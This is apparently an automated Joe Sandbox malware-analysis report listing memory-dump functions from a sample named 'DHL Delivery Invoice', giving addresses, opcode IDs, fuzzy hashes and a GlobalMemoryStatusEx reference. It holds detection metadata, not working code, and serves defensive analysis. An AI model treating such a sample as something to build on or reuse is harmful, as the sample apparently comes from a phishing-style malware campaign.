                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $kq$$kq
                                                                                                                                  • API String ID: 0-3550614674
                                                                                                                                  • Opcode ID: eb0a725d7b56809cb33e8a020d71731364e048276f007448abc842afa7687810
                                                                                                                                  • Instruction ID: c79ebaf03e60f99c577f5f39d825046d10981eca55c80d15b385fd142d0fce34
                                                                                                                                  • Opcode Fuzzy Hash: eb0a725d7b56809cb33e8a020d71731364e048276f007448abc842afa7687810
                                                                                                                                  • Instruction Fuzzy Hash: 7B514E70B005159FDB64DB69DA50B6EB3F6BB88640F108469D80A9B398EB75EC11CB90
                                                                                                                                  Function 00E8EB30 Relevance: 1.6, APIs: 1, Instructions: 129COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4258736998.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_e80000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d89e2344d3d96b12f9aa09eeaf60f03ceb382dfb55379d24e02e29e14920b320
                                                                                                                                  • Instruction ID: 280407d4eb30915345eae79d7b52f3bfd8cc25a713341d7b90861bac0f160180
                                                                                                                                  • Opcode Fuzzy Hash: d89e2344d3d96b12f9aa09eeaf60f03ceb382dfb55379d24e02e29e14920b320
                                                                                                                                  • Instruction Fuzzy Hash: A4413272D003998FCB14EFB9D9042EEBBF1AF89310F15856AD409E7351EB349845CB90
                                                                                                                                  Function 00E8EC18 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GlobalMemoryStatusEx.KERNEL32 ref: 00E8EC7F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4258736998.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_e80000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: GlobalMemoryStatus
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1890195054-0
                                                                                                                                  • Opcode ID: a7feb192edb4decdb6d52b75e0171d3c00a67207679cf8f8e4ad881fc9199f0a
                                                                                                                                  • Instruction ID: 00025f3cf40862cad89d6ba771416e27d4b075358d9c9d444b03fcc2b9e7a3d1
                                                                                                                                  • Opcode Fuzzy Hash: a7feb192edb4decdb6d52b75e0171d3c00a67207679cf8f8e4ad881fc9199f0a
                                                                                                                                  • Instruction Fuzzy Hash: B111F0B2C006699BCB10DFAAC544BDEFBF4AF48324F15816AD818B7250D378A944CFE5
                                                                                                                                  Function 06534BE0 Relevance: 1.4, Strings: 1, Instructions: 133COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: XPpq
                                                                                                                                  • API String ID: 0-1266478781
                                                                                                                                  • Opcode ID: d0a7dd4f4da7e090f1e95f6a66ccd36d96cfc41444c16c818214baa5286eac35
                                                                                                                                  • Instruction ID: fcad7fbd34903f4b8157a541ce4d9bd6bc9efe59e4dd1b607aa81f52b19be684
                                                                                                                                  • Opcode Fuzzy Hash: d0a7dd4f4da7e090f1e95f6a66ccd36d96cfc41444c16c818214baa5286eac35
                                                                                                                                  • Instruction Fuzzy Hash: 7A417F71E102189FDB54DFE4C954BAEBBF6FF88700F20C529E506AB399DA748C458B90
                                                                                                                                  Function 0653DB15 Relevance: 1.4, Strings: 1, Instructions: 122COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: PHkq
                                                                                                                                  • API String ID: 0-902561536
                                                                                                                                  • Opcode ID: 2b2db83efb79f4c37a55c063711db06349c3d32bfdd313ee4f927e0adc679665
                                                                                                                                  • Instruction ID: 90d2d4ee0da36464eb93c50934658afd48f91b38e0768b61209c1711f8e8d864
                                                                                                                                  • Opcode Fuzzy Hash: 2b2db83efb79f4c37a55c063711db06349c3d32bfdd313ee4f927e0adc679665
                                                                                                                                  • Instruction Fuzzy Hash: 5D41CD30E107599FDB65DF65C5906AEBBB6BF85700F208A2AD402EB250DBB5D846CF80
                                                                                                                                  Function 0653227D Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: PHkq
                                                                                                                                  • API String ID: 0-902561536
                                                                                                                                  • Opcode ID: 7973aed206c99e5ae5b4425a42e99de052f7d2ac9df35288a9d47ef49d33d4d0
                                                                                                                                  • Instruction ID: 2bfaa4a995b3821a2d8c25f5d8c0e9547f8f7c131a6fa983ac36354eac7978ac
                                                                                                                                  • Opcode Fuzzy Hash: 7973aed206c99e5ae5b4425a42e99de052f7d2ac9df35288a9d47ef49d33d4d0
                                                                                                                                  • Instruction Fuzzy Hash: B8311431B002258FCF54AB74CA506AE7BA3BF88600F20846CE006DB395DF35CD46CB90
                                                                                                                                  Function 06532290 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: PHkq
                                                                                                                                  • API String ID: 0-902561536
                                                                                                                                  • Opcode ID: c080d4b4d809ed979d74ecb49c80ba0b6196028df22d34f558dbab08955a8418
                                                                                                                                  • Instruction ID: 6d11ab2d492d270a32855cd31dbbc0562c2f0b2f9fd45b2bad9a1597c30a8135
                                                                                                                                  • Opcode Fuzzy Hash: c080d4b4d809ed979d74ecb49c80ba0b6196028df22d34f558dbab08955a8418
                                                                                                                                  • Instruction Fuzzy Hash: B131DE31B006158FDF58AB74DA546AE7BE7BB88600F208428E406DB399DF35DE46CB91
                                                                                                                                  Function 06536248 Relevance: .2, Instructions: 229COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 3bb0a39c5afe36f7b93b2bc09fbd481301ccb2ec897014c766ab7ab86c7810a1
                                                                                                                                  • Instruction ID: 8700e04f45857229c467c4df1bd73e2ac3d31040786acd91aa887ba895d3393e
                                                                                                                                  • Opcode Fuzzy Hash: 3bb0a39c5afe36f7b93b2bc09fbd481301ccb2ec897014c766ab7ab86c7810a1
                                                                                                                                  • Instruction Fuzzy Hash: 0261B2B2F001214FCF559A7DCD80A6EAAEBAFD4620B154439E80ADB379DE65DC0287C5
                                                                                                                                  Function 06534321 Relevance: .2, Instructions: 226COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 06c59e4c4735b94281854ff5c872f0d19543f41d4044bf17efecc3e78d9880bb
                                                                                                                                  • Instruction ID: 442ae3e129d85ab2c1f789a87d5ad0a758445510b0564a53edbc92dfbe68dc89
                                                                                                                                  • Opcode Fuzzy Hash: 06c59e4c4735b94281854ff5c872f0d19543f41d4044bf17efecc3e78d9880bb
                                                                                                                                  • Instruction Fuzzy Hash: 79815D30B106198FDF54DFA9D5546AEB7F6BF88700F108529E40ADB399EB34DC828B91
                                                                                                                                  Function 06534640 Relevance: .2, Instructions: 223COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: cbecd307d5f64747ca1bc8284f2dad38462c7a81ed9d158f13831e8641870f06
                                                                                                                                  • Instruction ID: 04aa9ffcf526b7e9c830f5218e4544e7e6bc4d166d8f9fbc10d1339323dc0431
                                                                                                                                  • Opcode Fuzzy Hash: cbecd307d5f64747ca1bc8284f2dad38462c7a81ed9d158f13831e8641870f06
                                                                                                                                  • Instruction Fuzzy Hash: 9D913B30E106198FDF60DFA8C950B9DB7B1FF89310F208599E549BB295DB70AA85CF90
                                                                                                                                  Function 06534658 Relevance: .2, Instructions: 210COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: bfef2e8697dbc604054bf546a863f9a38d8bc82ce2690f45021e9eee2ebed142
                                                                                                                                  • Instruction ID: cdbdc3d1d4e814dbd92b74097beb9ca1f0fe02b6267781f29769ac081fd19841
                                                                                                                                  • Opcode Fuzzy Hash: bfef2e8697dbc604054bf546a863f9a38d8bc82ce2690f45021e9eee2ebed142
                                                                                                                                  • Instruction Fuzzy Hash: F0912C70E106198BDF60DFA8C940B9DB7B1FF89310F208599D549BB355DB70AA85CF90
                                                                                                                                  Function 0653EB78 Relevance: .2, Instructions: 201COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a567ecac4460d3a948a0f61d75e52f640b75970e191aadbd4faadffd6374f527
                                                                                                                                  • Instruction ID: 787c8e04d2e9da29476a49b48c30095cba0477cf95b5b1941ea21a0371ac73b5
                                                                                                                                  • Opcode Fuzzy Hash: a567ecac4460d3a948a0f61d75e52f640b75970e191aadbd4faadffd6374f527
                                                                                                                                  • Instruction Fuzzy Hash: 66711B71A002199FCB54DFA9D991AAEBBF6FF84700F14C42AE405AB355DB30ED46CB50
                                                                                                                                  Function 0653EB68 Relevance: .2, Instructions: 201COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 389ecf5544c31008dc29575b6520743ab230646a563d78274a33dfcbd459fce1
                                                                                                                                  • Instruction ID: e00ae8a4e5495e86dea8568393c99340c9da6283d8cf825843ea8b8f3b983da2
                                                                                                                                  • Opcode Fuzzy Hash: 389ecf5544c31008dc29575b6520743ab230646a563d78274a33dfcbd459fce1
                                                                                                                                  • Instruction Fuzzy Hash: 36713D70A006199FCB55DFA8D991AAEBBF6FF84700F14C82AE405AB355DB30ED46CB40
                                                                                                                                  Function 0653FA88 Relevance: .2, Instructions: 176COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: ce3c164a06c6d59d648b93657bd1e613414bd026883c4f2822ba892e6418f101
                                                                                                                                  • Instruction ID: d9d11433ff8deac7fc3143abbd2b014ec39495d19100dfb0ad7547d7ac7a4dc8
                                                                                                                                  • Opcode Fuzzy Hash: ce3c164a06c6d59d648b93657bd1e613414bd026883c4f2822ba892e6418f101
                                                                                                                                  • Instruction Fuzzy Hash: C251B730F602249FEFA4566CD95476F379EF78A710F10482AE50AE73E9CA2DCC4547A2
                                                                                                                                  Function 0653FCD9 Relevance: .2, Instructions: 176COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d0f06945053505ee17485fc1bda5704c78d2576d636a914fe0177da4483fb492
                                                                                                                                  • Instruction ID: 53791ff438bf0026dd36cff82595b5640f7930fcf2fac57c2807f8f349ed2c39
                                                                                                                                  • Opcode Fuzzy Hash: d0f06945053505ee17485fc1bda5704c78d2576d636a914fe0177da4483fb492
                                                                                                                                  • Instruction Fuzzy Hash: 4051D131E00215DFCB54EBB8E5586ADBBB2FF88715F20886AE106D7350DB358845CB90
                                                                                                                                  Function 0653FA98 Relevance: .2, Instructions: 163COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: fe9d48a2145a6302110c6192d1d25182290e1e440a202fc1d146b53085fce6ee
                                                                                                                                  • Instruction ID: 61a890119ae2de7f8a682356ed00de4b71e0bfe62d3abf4983b1f9e8db444a8c
                                                                                                                                  • Opcode Fuzzy Hash: fe9d48a2145a6302110c6192d1d25182290e1e440a202fc1d146b53085fce6ee
                                                                                                                                  • Instruction Fuzzy Hash: FC51C730F602249FEFA4666CD95472F375EF789710F20482AE50AE73E8CA2DCC4547A2
                                                                                                                                  Function 06535499 Relevance: .1, Instructions: 133COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 63cd9f169b59338ef6aab5719516e0dabbab6e88e8f7f3b9ae668cb3ffb9e558
                                                                                                                                  • Instruction ID: b735bfcf232291154969d21408515d89330bc8e46289f782b18117a671e9b600
                                                                                                                                  • Opcode Fuzzy Hash: 63cd9f169b59338ef6aab5719516e0dabbab6e88e8f7f3b9ae668cb3ffb9e558
                                                                                                                                  • Instruction Fuzzy Hash: C0414B71E006199FDF60CEA9D880AAFF7B2FB84710F10492AE156D7654E330E9598F91
                                                                                                                                  Function 06535618 Relevance: .1, Instructions: 118COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 3014bdbd73bbe67dc71f30e48b57c2a40adc2598d097143ff741d9b356598593
                                                                                                                                  • Instruction ID: eb19e1064a1dc1beb3a8e521a05f7190b1080581833f88a571033d87c16c69c3
                                                                                                                                  • Opcode Fuzzy Hash: 3014bdbd73bbe67dc71f30e48b57c2a40adc2598d097143ff741d9b356598593
                                                                                                                                  • Instruction Fuzzy Hash: 6941C174E002158BDF61CB68C880ABEFBF2FB45750F24D926E459DB241E634D841CF91
                                                                                                                                  Function 06532140 Relevance: .1, Instructions: 96COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 8977ba9069d9c912079affdcc9876a4c7f9d759e6286cdea08d1da2a74dd3f7f
                                                                                                                                  • Instruction ID: 9ccaa8583c811def683612481a230b02e414ffa16682abe528c77b16c5fd1696
                                                                                                                                  • Opcode Fuzzy Hash: 8977ba9069d9c912079affdcc9876a4c7f9d759e6286cdea08d1da2a74dd3f7f
                                                                                                                                  • Instruction Fuzzy Hash: 72319C31E106199FDB19DFA4D994A9EB7B2BF88700F10C529E806E7354EB71ED46CB80
                                                                                                                                  Function 06532150 Relevance: .1, Instructions: 91COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 0cb356d97cee0b98fbc0f4915b8dcd0f85e1d579961fb6ac77abf3a0a2166d77
                                                                                                                                  • Instruction ID: 164c6c787133fb8125cfb502e6728b6a7146a4f7c6c16eeba034b11e29f294d1
                                                                                                                                  • Opcode Fuzzy Hash: 0cb356d97cee0b98fbc0f4915b8dcd0f85e1d579961fb6ac77abf3a0a2166d77
                                                                                                                                  • Instruction Fuzzy Hash: DA318B31E106199BDB19CFA4C954A9EB7B6BF88700F10C529E806E7354EB71AD41CB80
                                                                                                                                  Function 06533B21 Relevance: .1, Instructions: 82COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 31fdfeafe0987a83a1d67136ff621af57b4986f472656c334d91191b04c08708
                                                                                                                                  • Instruction ID: e118288f6d44380012ecacd696cf0938a6254322bf2ebad4730bf6e6f6008bc2
                                                                                                                                  • Opcode Fuzzy Hash: 31fdfeafe0987a83a1d67136ff621af57b4986f472656c334d91191b04c08708
                                                                                                                                  • Instruction Fuzzy Hash: C7219C75F01A159FDB10DF69E980AAEBBF1BB48710F00846AE909EB354E730D851CB90
                                                                                                                                  Function 06533B30 Relevance: .1, Instructions: 78COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 447f61eaafabdd65274920edf3ea7e6a5e7a8db55f8752dc451d07e248137bf0
                                                                                                                                  • Instruction ID: ec5cd6ffe56ae5617f5b7918b359c89099edfa429baa2158c597809a58152642
                                                                                                                                  • Opcode Fuzzy Hash: 447f61eaafabdd65274920edf3ea7e6a5e7a8db55f8752dc451d07e248137bf0
                                                                                                                                  • Instruction Fuzzy Hash: D2218E75F01A299FDB50DF69D980AAEB7F1FB48B10F10846AE909EB354E731D840CB94
                                                                                                                                  Function 00B0D3BC Relevance: .1, Instructions: 72COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4256567066.0000000000B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B0D000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_b0d000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 7ffbf770baafac9f3680ddcd4c0b0f0e7a6ac16be43fb5921fc7a081fb6117cc
                                                                                                                                  • Instruction ID: 5d98fdffe1ef8edbc2f65e6dee3a7e437e2047c6bb3c5a7b6aa0a51ba98514fb
                                                                                                                                  • Opcode Fuzzy Hash: 7ffbf770baafac9f3680ddcd4c0b0f0e7a6ac16be43fb5921fc7a081fb6117cc
                                                                                                                                  • Instruction Fuzzy Hash: CA210171604204DFCB04DF54D9C4B2ABFA5FB84314F20C6ADE80A4B3D6C37AE846CA62
                                                                                                                                  Function 00B0D044 Relevance: .1, Instructions: 72COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4256567066.0000000000B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B0D000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_b0d000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 9788e6e366cdbbd3eb0e8c4546a82ba134de07144de80641c2bdd68e6a30b632
                                                                                                                                  • Instruction ID: ac809e7127cee0d34117623b965497aa4d831d2a3195309e257ec722461491e8
                                                                                                                                  • Opcode Fuzzy Hash: 9788e6e366cdbbd3eb0e8c4546a82ba134de07144de80641c2bdd68e6a30b632
                                                                                                                                  • Instruction Fuzzy Hash: 9B213471504204DFCB10DF64C9D4B26BFA5FB84314F20C5ADE84D4B2D2D73AD846CA61
                                                                                                                                  Function 00B0D20C Relevance: .1, Instructions: 72COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4256567066.0000000000B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B0D000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_b0d000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 0064c51e488b0904e5d87332fdb5e22c7adaeb0d1fca3ef2234704744d335001
                                                                                                                                  • Instruction ID: 5359b01e5bcce0779d1e6b9f240eb0c6adf7516691b219b5a77ff9473c7b9ad5
                                                                                                                                  • Opcode Fuzzy Hash: 0064c51e488b0904e5d87332fdb5e22c7adaeb0d1fca3ef2234704744d335001
                                                                                                                                  • Instruction Fuzzy Hash: B0212371604244DFDB01DF94D9C4B2AFFA5FB84324F20C6A9E8494B2C5C37AD846CA61
                                                                                                                                  Function 06536D70 Relevance: .1, Instructions: 68COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 3f6f8606f3de983b983d59218942560f8fdf4964cf8c9052d9c962fd366463a8
                                                                                                                                  • Instruction ID: fe3dd3a4aa1901bb9757f69bba9231618e2665193bb0c1933302864fcb9a7316
                                                                                                                                  • Opcode Fuzzy Hash: 3f6f8606f3de983b983d59218942560f8fdf4964cf8c9052d9c962fd366463a8
                                                                                                                                  • Instruction Fuzzy Hash: 27219D30F101299FCF94DAA9E9506AEB7B6EB84710F248829E405DB344DB31ED51CFC4
                                                                                                                                  Function 06533C40 Relevance: .1, Instructions: 59COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 37f8797c0a217554ccc53b3574058d8fa5fdcc31bb54807be994c8ac739dad23
                                                                                                                                  • Instruction ID: 3efa6fe075e7ed7d407c68353ecbe30ee3da379e322e5c1b0872af44799f03b1
                                                                                                                                  • Opcode Fuzzy Hash: 37f8797c0a217554ccc53b3574058d8fa5fdcc31bb54807be994c8ac739dad23
                                                                                                                                  • Instruction Fuzzy Hash: 1A118E31B101384FDF549A69D9146AF73EAAFC8B50F008439D80AE7354EF25DC118BE0
                                                                                                                                  Function 06534280 Relevance: .1, Instructions: 58COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.4279098124.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_6530000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
